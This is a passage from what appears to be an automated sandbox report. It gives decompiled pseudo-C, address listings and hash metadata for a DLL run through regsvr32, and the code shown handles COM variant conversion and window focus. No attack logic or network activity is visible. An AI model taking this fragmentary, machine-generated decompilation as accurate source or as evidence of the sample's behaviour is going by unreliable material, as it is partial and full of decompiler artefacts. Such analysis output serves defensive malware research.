                                                                                                                					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x100a47bc, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
                                                                                                                					E1003B344(_t300 - 0x68);
                                                                                                                					_t203 =  *(_t300 - 0x4c);
                                                                                                                					if(_t203 == _t257) {
                                                                                                                						L46:
                                                                                                                						_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                						E10009F3F(_t257, _t293, _t295, _t319);
                                                                                                                						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
                                                                                                                						if( *(_t300 + 0xc) >= _t257) {
                                                                                                                							L61:
                                                                                                                							_t295 =  *(_t300 + 0x10);
                                                                                                                							if(_t295 == _t257) {
                                                                                                                								L76:
                                                                                                                								 *(_t300 - 4) = 0;
                                                                                                                								_t190 = E10039D98(_t300 - 0x68);
                                                                                                                								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
                                                                                                                								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push( *((intOrPtr*)(_t300 - 0x54)));
                                                                                                                									_t190 = E10009F3F(_t257, _t293, _t295, __eflags);
                                                                                                                								}
                                                                                                                								goto L78;
                                                                                                                							}
                                                                                                                							if(_t295 == 0xc) {
                                                                                                                								L65:
                                                                                                                								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
                                                                                                                								__eflags = _t206 - 0x13;
                                                                                                                								if(_t206 > 0x13) {
                                                                                                                									goto L76;
                                                                                                                								}
                                                                                                                								switch( *((intOrPtr*)(_t206 * 4 +  &M1003B9B7))) {
                                                                                                                									case 0:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 1:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										__ecx =  *(__ebp - 0x3c);
                                                                                                                										 *( *(__ebp + 0x14)) = __ecx;
                                                                                                                										goto L76;
                                                                                                                									case 2:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 3:
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
                                                                                                                										goto L76;
                                                                                                                									case 4:
                                                                                                                										__ecx =  *(__ebp - 0x3c);
                                                                                                                										__eax =  *(__ebp + 0x14);
                                                                                                                										 *__eax =  *(__ebp - 0x3c);
                                                                                                                										__ecx =  *(__ebp - 0x38);
                                                                                                                										 *(__eax + 4) = __ecx;
                                                                                                                										goto L76;
                                                                                                                									case 5:
                                                                                                                										__eax = L10020F02(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
                                                                                                                										_push( *(__ebp - 0x3c));
                                                                                                                										__imp__#6();
                                                                                                                										goto L76;
                                                                                                                									case 6:
                                                                                                                										__ecx =  *(__ebp + 0x14);
                                                                                                                										__eax = 0;
                                                                                                                										__eflags =  *(__ebp - 0x3c) - __bx;
                                                                                                                										__eax = 0 | __eflags != 0x00000000;
                                                                                                                										 *__ecx = __eflags != 0;
                                                                                                                										goto L76;
                                                                                                                									case 7:
                                                                                                                										__edi =  *(__ebp + 0x14);
                                                                                                                										__esi = __ebp - 0x44;
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										asm("movsd");
                                                                                                                										__ebx = 0;
                                                                                                                										goto L76;
                                                                                                                									case 8:
                                                                                                                										goto L76;
                                                                                                                									case 9:
                                                                                                                										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
                                                                                                                										goto L76;
                                                                                                                								}
                                                                                                                							}
                                                                                                                							_t208 = _t300 - 0x44;
                                                                                                                							__imp__#12(_t208, _t208, _t257, _t295);
                                                                                                                							_t293 = _t208;
                                                                                                                							_t321 = _t293 - _t257;
                                                                                                                							if(_t293 >= _t257) {
                                                                                                                								goto L65;
                                                                                                                							}
                                                                                                                							__imp__#9(_t300 - 0x44);
                                                                                                                							_push(_t293);
                                                                                                                							L49:
                                                                                                                							E1000A8F5(_t257, _t293, _t295, _t321);
                                                                                                                							L50:
                                                                                                                							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
                                                                                                                							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
                                                                                                                								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
                                                                                                                							}
                                                                                                                							_t211 = E10009F14(_t322, 0x20);
                                                                                                                							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
                                                                                                                							_t323 = _t211 - _t257;
                                                                                                                							 *(_t300 - 4) = 4;
                                                                                                                							if(_t211 != _t257) {
                                                                                                                								_push( *((intOrPtr*)(_t300 - 0x88)));
                                                                                                                								_push(_t257);
                                                                                                                								_push(_t257);
                                                                                                                								_t257 = E1003A708(_t257, _t211, _t293, _t295, _t323);
                                                                                                                							}
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							_t293 = __imp__#7;
                                                                                                                							 *(_t300 - 4) = 1;
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t139 = _t257 + 0x18; // 0x18
                                                                                                                								L1000AF5E(_t139,  *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							}
                                                                                                                							_t296 = __imp__#6;
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t143 = _t257 + 0xc; // 0xc
                                                                                                                								L1000AF5E(_t143,  *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							}
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
                                                                                                                							_push( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							if( *_t293() != 0) {
                                                                                                                								_t147 = _t257 + 0x14; // 0x14
                                                                                                                								L1000AF5E(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							}
                                                                                                                							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
                                                                                                                							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
                                                                                                                							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
                                                                                                                							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
                                                                                                                							L10048E48(_t300 + 0x14, 0x100b4864);
                                                                                                                							goto L61;
                                                                                                                						}
                                                                                                                						__imp__#9(_t300 - 0x44);
                                                                                                                						_t321 =  *(_t300 + 0xc) - 0x80020009;
                                                                                                                						if( *(_t300 + 0xc) == 0x80020009) {
                                                                                                                							goto L50;
                                                                                                                						}
                                                                                                                						_push( *(_t300 + 0xc));
                                                                                                                						goto L49;
                                                                                                                					} else {
                                                                                                                						_t295 =  *(_t300 + 0x18);
                                                                                                                						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
                                                                                                                						while(1) {
                                                                                                                							_t319 =  *_t295;
                                                                                                                							if( *_t295 == 0) {
                                                                                                                								goto L46;
                                                                                                                							}
                                                                                                                							_t230 =  *_t295;
                                                                                                                							__eflags = _t230 - 8;
                                                                                                                							if(_t230 == 8) {
                                                                                                                								L43:
                                                                                                                								__imp__#9(_t293);
                                                                                                                								L44:
                                                                                                                								_t293 = _t293 - 0x10;
                                                                                                                								_t295 =  &(_t295[1]);
                                                                                                                								__eflags = _t295;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t230 - 0xe;
                                                                                                                							if(_t230 != 0xe) {
                                                                                                                								goto L44;
                                                                                                                							}
                                                                                                                							goto L43;
                                                                                                                						}
                                                                                                                						goto L46;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t290 = 0x10;
                                                                                                                					_t297 = E10009F14(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
                                                                                                                					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
                                                                                                                					E10049170(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
                                                                                                                					_t236 =  *(_t300 + 0x18);
                                                                                                                					_t277 =  *(_t300 - 0x4c) << 4;
                                                                                                                					_t302 = _t302 + 0x10;
                                                                                                                					_t36 = _t277 - 0x10; // -16
                                                                                                                					_t278 = _t297 + _t36;
                                                                                                                					 *(_t300 - 0x14) = _t236;
                                                                                                                					 *(_t300 - 0x10) = _t278;
                                                                                                                					if( *_t236 == 0) {
                                                                                                                						goto L37;
                                                                                                                					}
                                                                                                                					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
                                                                                                                					_t299 =  &(_t278[4]);
                                                                                                                					_t258 = _t237 - 4;
                                                                                                                					 *(_t300 - 0x1c) = _t299;
                                                                                                                					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
                                                                                                                					do {
                                                                                                                						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
                                                                                                                						_t279 =  *(_t300 - 0x10);
                                                                                                                						 *_t279 = _t240;
                                                                                                                						if((_t240 & 0x00000040) != 0) {
                                                                                                                							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
                                                                                                                						}
                                                                                                                						_t241 =  *_t279 & 0x0000ffff;
                                                                                                                						_t313 = _t241 - 0x4002;
                                                                                                                						if(_t313 > 0) {
                                                                                                                							_t242 = _t241 - 0x4003;
                                                                                                                							__eflags = _t242 - 0x12;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							switch( *((intOrPtr*)(_t242 * 4 +  &M1003B96B))) {
                                                                                                                								case 0:
                                                                                                                									goto L34;
                                                                                                                								case 1:
                                                                                                                									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                									_t258 = _t258 + _t293;
                                                                                                                									_t244 =  *_t258;
                                                                                                                									asm("sbb ecx, ecx");
                                                                                                                									 *_t244 =  ~( *_t244) & 0x0000ffff;
                                                                                                                									 *_t299 = _t244;
                                                                                                                									_t245 = E10039728(_t300 - 0x34, _t244, _t244, 0);
                                                                                                                									 *(_t300 - 4) = 3;
                                                                                                                									E10039E62(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
                                                                                                                									__eflags =  *(_t300 - 0x2c);
                                                                                                                									 *(_t300 - 4) = 1;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										_push( *((intOrPtr*)(_t300 - 0x34)));
                                                                                                                										E10009F3F(_t258, _t293, _t299, __eflags);
                                                                                                                									}
                                                                                                                									goto L35;
                                                                                                                								case 2:
                                                                                                                									goto L35;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t313 == 0) {
                                                                                                                								L34:
                                                                                                                								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                								_t258 = _t258 + _t293;
                                                                                                                								__eflags = _t258;
                                                                                                                								 *_t299 =  *_t258;
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							_t250 = _t241;
                                                                                                                							if(_t250 > 0x13) {
                                                                                                                								goto L35;
                                                                                                                							}
                                                                                                                							switch( *((intOrPtr*)(_t250 * 4 +  &M1003B91B))) {
                                                                                                                								case 0:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__ax =  *__ebx;
                                                                                                                									goto L28;
                                                                                                                								case 1:
                                                                                                                									goto L34;
                                                                                                                								case 2:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                									goto L35;
                                                                                                                								case 3:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									 *__esi =  *( *(__ebp + 0x1c));
                                                                                                                									goto L35;
                                                                                                                								case 4:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									goto L17;
                                                                                                                								case 5:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									_push(__eax);
                                                                                                                									 *(__ebp - 0x1c) = __eax;
                                                                                                                									__imp__#2();
                                                                                                                									__eflags =  *(__ebp - 0x1c);
                                                                                                                									 *__esi = __eax;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									__eflags = __eax;
                                                                                                                									if(__eflags != 0) {
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									goto L23;
                                                                                                                								case 6:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									 *__ebx =  ~( *__ebx);
                                                                                                                									asm("sbb eax, eax");
                                                                                                                									L28:
                                                                                                                									 *__esi = __ax;
                                                                                                                									goto L35;
                                                                                                                								case 7:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
                                                                                                                									__edi =  *(__ebp - 0x10);
                                                                                                                									__ebx =  &(__ebx[1]);
                                                                                                                									__esi =  *__ebx;
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									asm("movsd");
                                                                                                                									__esi =  *(__ebp - 0x1c);
                                                                                                                									_push(4);
                                                                                                                									_pop(__edi);
                                                                                                                									goto L35;
                                                                                                                								case 8:
                                                                                                                									L24:
                                                                                                                									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
                                                                                                                									__ebx = __ebx + __edi;
                                                                                                                									__eax =  *__ebx;
                                                                                                                									_push(__eax);
                                                                                                                									__ecx = __ebp - 0x18;
                                                                                                                									 *(__ebp - 0x1c) = __eax;
                                                                                                                									__eax = E1000B9D2(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                									_push( *(__ebp - 0x18));
                                                                                                                									 *((char*)(__ebp - 4)) = 2;
                                                                                                                									__imp__#2();
                                                                                                                									__eflags =  *(__ebp - 0x1c);
                                                                                                                									 *__esi = __eax;
                                                                                                                									if( *(__ebp - 0x1c) == 0) {
                                                                                                                										L26:
                                                                                                                										__ecx =  *(__ebp - 0x18);
                                                                                                                										__eax =  *(__ebp - 0x10);
                                                                                                                										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
                                                                                                                										 *( *(__ebp - 0x10)) = 8;
                                                                                                                										 *((char*)(__ebp - 4)) = 1;
                                                                                                                										__eax = L100013E3(__ecx, __edx);
                                                                                                                										goto L35;
                                                                                                                									}
                                                                                                                									__eflags = __eax;
                                                                                                                									if(__eflags == 0) {
                                                                                                                										L23:
                                                                                                                										__eax = E1000A035(__ebx, __ecx, __edi, __esi, __eflags);
                                                                                                                										goto L24;
                                                                                                                									}
                                                                                                                									goto L26;
                                                                                                                								case 9:
                                                                                                                									goto L35;
                                                                                                                								case 0xa:
                                                                                                                									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
                                                                                                                									_t258 = _t258 + _t293;
                                                                                                                									 *_t299 =  *_t258;
                                                                                                                									goto L35;
                                                                                                                								case 0xb:
                                                                                                                									__eax =  *(__ebp + 0x1c);
                                                                                                                									__eax =  *(__ebp + 0x1c) + 8;
                                                                                                                									 *(__ebp + 0x1c) = __eax;
                                                                                                                									__ebx =  &(__ebx[2]);
                                                                                                                									__eflags = __ebx;
                                                                                                                									L17:
                                                                                                                									__ecx =  *__eax;
                                                                                                                									 *__esi = __ecx;
                                                                                                                									 *(__esi + 4) = __eax;
                                                                                                                									goto L35;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L35:
                                                                                                                						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
                                                                                                                						_t299 = _t299 - 0x10;
                                                                                                                						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
                                                                                                                						 *(_t300 - 0x1c) = _t299;
                                                                                                                					} while ( *( *(_t300 - 0x14)) != 0);
                                                                                                                					_t257 = 0;
                                                                                                                					goto L37;
                                                                                                                				}
                                                                                                                			}
                                                                                                                0x1003b90a
                                                                                                                0x1003b90d
                                                                                                                0x1003b912
                                                                                                                0x00000000
                                                                                                                0x1003b908
                                                                                                                0x1003b848
                                                                                                                0x1003b86d
                                                                                                                0x1003b870
                                                                                                                0x1003b873
                                                                                                                0x1003b876
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b878
                                                                                                                0x00000000
                                                                                                                0x1003b889
                                                                                                                0x1003b890
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8ed
                                                                                                                0x1003b8f0
                                                                                                                0x1003b8f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8a8
                                                                                                                0x1003b8ab
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8b2
                                                                                                                0x1003b8b5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b895
                                                                                                                0x1003b898
                                                                                                                0x1003b89b
                                                                                                                0x1003b89d
                                                                                                                0x1003b8a0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8bf
                                                                                                                0x1003b8c4
                                                                                                                0x1003b8c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8cf
                                                                                                                0x1003b8d2
                                                                                                                0x1003b8d4
                                                                                                                0x1003b8d8
                                                                                                                0x1003b8db
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b8df
                                                                                                                0x1003b8e2
                                                                                                                0x1003b8e5
                                                                                                                0x1003b8e6
                                                                                                                0x1003b8e7
                                                                                                                0x1003b8e8
                                                                                                                0x1003b8e9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b885
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b878
                                                                                                                0x1003b84c
                                                                                                                0x1003b851
                                                                                                                0x1003b857
                                                                                                                0x1003b859
                                                                                                                0x1003b85b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b861
                                                                                                                0x1003b867
                                                                                                                0x1003b77f
                                                                                                                0x1003b77f
                                                                                                                0x1003b784
                                                                                                                0x1003b784
                                                                                                                0x1003b787
                                                                                                                0x1003b790
                                                                                                                0x1003b790
                                                                                                                0x1003b795
                                                                                                                0x1003b79b
                                                                                                                0x1003b79e
                                                                                                                0x1003b7a0
                                                                                                                0x1003b7a4
                                                                                                                0x1003b7a6
                                                                                                                0x1003b7ae
                                                                                                                0x1003b7af
                                                                                                                0x1003b7b5
                                                                                                                0x1003b7b5
                                                                                                                0x1003b7b7
                                                                                                                0x1003b7bd
                                                                                                                0x1003b7c3
                                                                                                                0x1003b7cb
                                                                                                                0x1003b7d3
                                                                                                                0x1003b7d6
                                                                                                                0x1003b7d6
                                                                                                                0x1003b7e1
                                                                                                                0x1003b7e7
                                                                                                                0x1003b7e9
                                                                                                                0x1003b7f0
                                                                                                                0x1003b7f5
                                                                                                                0x1003b7f8
                                                                                                                0x1003b7f8
                                                                                                                0x1003b800
                                                                                                                0x1003b802
                                                                                                                0x1003b809
                                                                                                                0x1003b80e
                                                                                                                0x1003b811
                                                                                                                0x1003b811
                                                                                                                0x1003b819
                                                                                                                0x1003b81e
                                                                                                                0x1003b824
                                                                                                                0x1003b830
                                                                                                                0x1003b833
                                                                                                                0x00000000
                                                                                                                0x1003b833
                                                                                                                0x1003b76d
                                                                                                                0x1003b773
                                                                                                                0x1003b77a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b77c
                                                                                                                0x00000000
                                                                                                                0x1003b72b
                                                                                                                0x1003b72e
                                                                                                                0x1003b734
                                                                                                                0x1003b74f
                                                                                                                0x1003b74f
                                                                                                                0x1003b752
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b73a
                                                                                                                0x1003b73c
                                                                                                                0x1003b73e
                                                                                                                0x1003b744
                                                                                                                0x1003b745
                                                                                                                0x1003b74b
                                                                                                                0x1003b74b
                                                                                                                0x1003b74e
                                                                                                                0x1003b74e
                                                                                                                0x00000000
                                                                                                                0x1003b74e
                                                                                                                0x1003b740
                                                                                                                0x1003b742
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b742
                                                                                                                0x00000000
                                                                                                                0x1003b74f
                                                                                                                0x1003b4ae
                                                                                                                0x1003b4b2
                                                                                                                0x1003b4c2
                                                                                                                0x1003b4cd
                                                                                                                0x1003b4d0
                                                                                                                0x1003b4d8
                                                                                                                0x1003b4db
                                                                                                                0x1003b4de
                                                                                                                0x1003b4e4
                                                                                                                0x1003b4e4
                                                                                                                0x1003b4e8
                                                                                                                0x1003b4eb
                                                                                                                0x1003b4ee
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b4f4
                                                                                                                0x1003b4f9
                                                                                                                0x1003b4fc
                                                                                                                0x1003b502
                                                                                                                0x1003b505
                                                                                                                0x1003b508
                                                                                                                0x1003b50b
                                                                                                                0x1003b511
                                                                                                                0x1003b514
                                                                                                                0x1003b517
                                                                                                                0x1003b521
                                                                                                                0x1003b521
                                                                                                                0x1003b524
                                                                                                                0x1003b52c
                                                                                                                0x1003b52e
                                                                                                                0x1003b64b
                                                                                                                0x1003b650
                                                                                                                0x1003b653
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b655
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b65c
                                                                                                                0x1003b65f
                                                                                                                0x1003b661
                                                                                                                0x1003b667
                                                                                                                0x1003b671
                                                                                                                0x1003b678
                                                                                                                0x1003b67a
                                                                                                                0x1003b686
                                                                                                                0x1003b68a
                                                                                                                0x1003b68f
                                                                                                                0x1003b693
                                                                                                                0x1003b697
                                                                                                                0x1003b699
                                                                                                                0x1003b69c
                                                                                                                0x1003b6a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b534
                                                                                                                0x1003b534
                                                                                                                0x1003b6a4
                                                                                                                0x1003b6a4
                                                                                                                0x1003b6a7
                                                                                                                0x1003b6a7
                                                                                                                0x1003b6ab
                                                                                                                0x00000000
                                                                                                                0x1003b6ab
                                                                                                                0x1003b53b
                                                                                                                0x1003b53f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003b545
                                                                                                                0x00000000
                                                                                                                0x1003b55a
                                                                                                                0x1003b55d
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4128688680-0
                                                                                                                • Opcode ID: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
                                                                                                                • Instruction ID: 84fc08546edbdc28cc08b8fc5503e57ba4d76b13c18cf0e412093733c6966a00
                                                                                                                • Opcode Fuzzy Hash: 29c44fd8ba22138191f675dc56ed80d01559a1aa598323f94008261ca5ed00b7
                                                                                                                • Instruction Fuzzy Hash: BDF167B4D0064ADFDF12CFA8C885AEDBBB4EF05345F104069EA51AB2A2DB349A55CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10033257(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v24;
                                                                                                                				int _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				struct HWND__* _v52;
                                                                                                                				signed int _t139;
                                                                                                                				signed int _t141;
                                                                                                                				void* _t142;
                                                                                                                				signed int _t146;
                                                                                                                				signed int _t149;
                                                                                                                				intOrPtr _t150;
                                                                                                                				signed int _t152;
                                                                                                                				signed char _t153;
                                                                                                                				signed int _t154;
                                                                                                                				signed int _t155;
                                                                                                                				int _t156;
                                                                                                                				signed int _t161;
                                                                                                                				signed int _t165;
                                                                                                                				void* _t167;
                                                                                                                				signed char _t171;
                                                                                                                				signed int _t172;
                                                                                                                				signed int _t173;
                                                                                                                				signed int _t174;
                                                                                                                				signed char _t182;
                                                                                                                				intOrPtr _t183;
                                                                                                                				signed int _t184;
                                                                                                                				short _t188;
                                                                                                                				signed int _t189;
                                                                                                                				signed int _t190;
                                                                                                                				signed int _t191;
                                                                                                                				signed int _t195;
                                                                                                                				signed int _t198;
                                                                                                                				signed char _t199;
                                                                                                                				signed int _t200;
                                                                                                                				signed int _t201;
                                                                                                                				short _t204;
                                                                                                                				signed int _t206;
                                                                                                                				signed int _t207;
                                                                                                                				signed int _t208;
                                                                                                                				signed int _t209;
                                                                                                                				void* _t211;
                                                                                                                				signed int _t215;
                                                                                                                				signed int _t216;
                                                                                                                				struct HWND__* _t217;
                                                                                                                				struct tagMSG* _t221;
                                                                                                                				intOrPtr _t224;
                                                                                                                				void* _t231;
                                                                                                                				void* _t234;
                                                                                                                				struct tagMSG* _t240;
                                                                                                                				signed int _t242;
                                                                                                                				int _t243;
                                                                                                                				signed int _t244;
                                                                                                                				long _t247;
                                                                                                                				intOrPtr _t249;
                                                                                                                				signed int _t251;
                                                                                                                				signed int _t254;
                                                                                                                				signed int _t255;
                                                                                                                				signed int _t256;
                                                                                                                				signed int _t257;
                                                                                                                				signed int _t258;
                                                                                                                				void* _t260;
                                                                                                                				void* _t262;
                                                                                                                
                                                                                                                				_t232 = __ecx;
                                                                                                                				_t260 = _t262;
                                                                                                                				_push(__ecx);
                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                				_push(__ebx);
                                                                                                                				_push(__esi);
                                                                                                                				_push(__edi);
                                                                                                                				_t139 = E100330B4(_a4, _a8);
                                                                                                                				_t238 = _t139;
                                                                                                                				if(_t139 == 0) {
                                                                                                                					_t232 = _a4;
                                                                                                                					_t231 = E100122D1(_a4);
                                                                                                                					if(_t231 != 0) {
                                                                                                                						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                						_a8 = _t221;
                                                                                                                						if(_t221 != 0) {
                                                                                                                							while(1) {
                                                                                                                								_t9 = _t231 + 0x40; // 0x40
                                                                                                                								_t232 = _t9;
                                                                                                                								_t258 =  *(E10012115( &_a8));
                                                                                                                								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                									if(_a8 != 0) {
                                                                                                                										continue;
                                                                                                                									} else {
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									break;
                                                                                                                								}
                                                                                                                								goto L10;
                                                                                                                							}
                                                                                                                							_t238 = _t258;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				L10:
                                                                                                                				_t247 = 0;
                                                                                                                				while(1) {
                                                                                                                					_t238 = E10033106(_t232, _a4, _t238, _a12);
                                                                                                                					if(_t238 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t142 = E10032BA1(_t238);
                                                                                                                					_pop(_t232);
                                                                                                                					if(_t142 == 0) {
